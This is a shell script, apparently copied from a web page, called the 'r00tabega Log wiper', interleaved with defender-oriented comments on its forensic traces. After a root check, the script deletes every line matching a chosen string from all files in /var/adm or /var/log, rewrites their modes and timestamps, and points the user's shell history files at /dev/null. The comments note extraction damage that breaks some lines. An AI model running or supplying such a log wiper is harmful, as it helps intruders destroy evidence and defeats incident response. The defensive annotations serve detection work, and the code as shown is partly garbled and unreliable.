|
清除入侵日志的一个脚本
#!/bin/sh
# idiot_check: privilege gate and entry point of this log wiper.
# Compares the value captured from `id` with "0". On mismatch it prints
# "Must be run as root." and exits 1; otherwise it calls getownedbyname.
# Defender note: the tool refuses to proceed without uid 0, so evidence that
# it ran on a host implies root access had already been obtained there.
idiot_check()
{
# NOTE(review): the "/" separators on the next line look like pipe characters
# lost in extraction. As written, the text after `id` is passed to id as
# arguments rather than filtering its output - confirm against the original.
CUID=`id / awk '{ print $1 }'/cut -b 5`
if [ "$CUID" != "0" ];
then
echo
echo -e "Must be run as root."
echo
exit 1
else
# Root check passed: continue to the interactive log-filtering stage.
getownedbyname;
fi
}
# getownedbyname: prompts for a string, then rewrites every entry in the local
# log directory with the lines matching that string removed, and finally calls
# cleanup.
# Reads:   HOST from stdin (exits 1 with "Nothing done..." when empty).
# Writes:  DIR, LOGS, LOG (all global); files under /var/adm or /var/log.
# Defender notes (what this leaves behind, for triage and detection):
#   - Only the local log directory is touched; copies already forwarded to a
#     remote collector are outside this function's reach.
#   - Each file is deleted and recreated, so it gets a new inode, a fresh
#     mtime and mode 0640, and is created by the invoking user. A directory
#     where every file shares mode 0640 and has mtimes about one second apart
#     is a strong tamper indicator.
#   - A logging process that still holds the old file open may keep writing to
#     the unlinked inode, so a log that stops growing is worth checking.
getownedbyname()
{
echo
# Banner strings below are fixed text and usable as static signatures.
echo -e "r00tabega Log wiper, version 0.5 -By Tutor"
echo -e "http://www.r00tabega.com"
echo
echo -e "Hostname [or string] to make a ghost in the logs? \c"
read HOST
if [ "$HOST" == "" ];
then
echo -e "Nothing done..."
exit 1
fi
# Pick the log directory: /var/adm when it exists, otherwise /var/log.
if [ -d "/var/adm" ];
then
DIR="adm"
else
DIR="log"
fi
echo -e "Cleaning out /var/$DIR"
cd /var/$DIR;
# Every directory entry is processed; nothing is filtered by type or name.
LOGS=`ls -1 /var/$DIR`
for LOG in $LOGS
do
# grep -v uses HOST as a pattern and drops every matching line, so unrelated
# records that contain the same string disappear too (visible as gaps).
# Non-text files are not treated specially - presumably binary accounting
# files in the directory end up altered as well; verify on the affected host.
grep -v "$HOST" /var/$DIR/$LOG >> /var/$DIR/TempFile
# Original is unlinked and replaced by the filtered copy (new inode).
rm /var/$DIR/$LOG
mv TempFile /var/$DIR/$LOG
# mtime is set to the current time and the mode forced to 0640 for every file,
# regardless of what the original timestamps and permissions were.
touch /var/$DIR/$LOG
chmod 0640 /var/$DIR/$LOG
# One-second pause per file: resulting mtimes form a sequential run.
sleep 1
done
cleanup;
}
# cleanup: asks whether to remove shell history files and acts on the answer.
# Reads:   SLOG from stdin.
#   ""      -> calls itself again to re-prompt
#   n / N   -> prints a message and exits 1 without touching history files
#   y / Y   -> replaces ~/.bash_history and ~/.history with symlinks to
#              /dev/null
#   other   -> no branch matches; the function returns without doing anything
# Defender note: a history file that is a symlink to /dev/null is a simple,
# checkable indicator. Only the invoking user's home (~) is affected here.
cleanup()
{
echo
echo "Logs are good, now for shell history files..."
echo
echo -e "Remove shell history files? [Y/N]: \c"
read SLOG
if [ "$SLOG" == "" ];
then
# Empty answer: recurse to ask again.
cleanup;
elif [ "$SLOG" == "n" -o "$SLOG" == "N" ];
then
echo
echo "Shell history files left alone, good luck."
exit 1
elif [ "$SLOG" == "y" -o "$SLOG" == "Y" ];
then
# Existing history is deleted and the path is pointed at /dev/null, so
# anything written to it afterwards is discarded.
rm -rf ~/.bash_history;
ln -s /dev/null ~/.bash_history
rm -rf ~/.history;
ln -s /dev/null ~/.history
sleep 1
echo
echo -e "All clean, go about your business..."
fi
}
# Script entry: start with the root check, which chains into the other stages.
# NOTE(review): the trailing "|" looks like table-cell residue from the page
# this listing was copied from; as written it leaves an unterminated pipeline.
idiot_check; |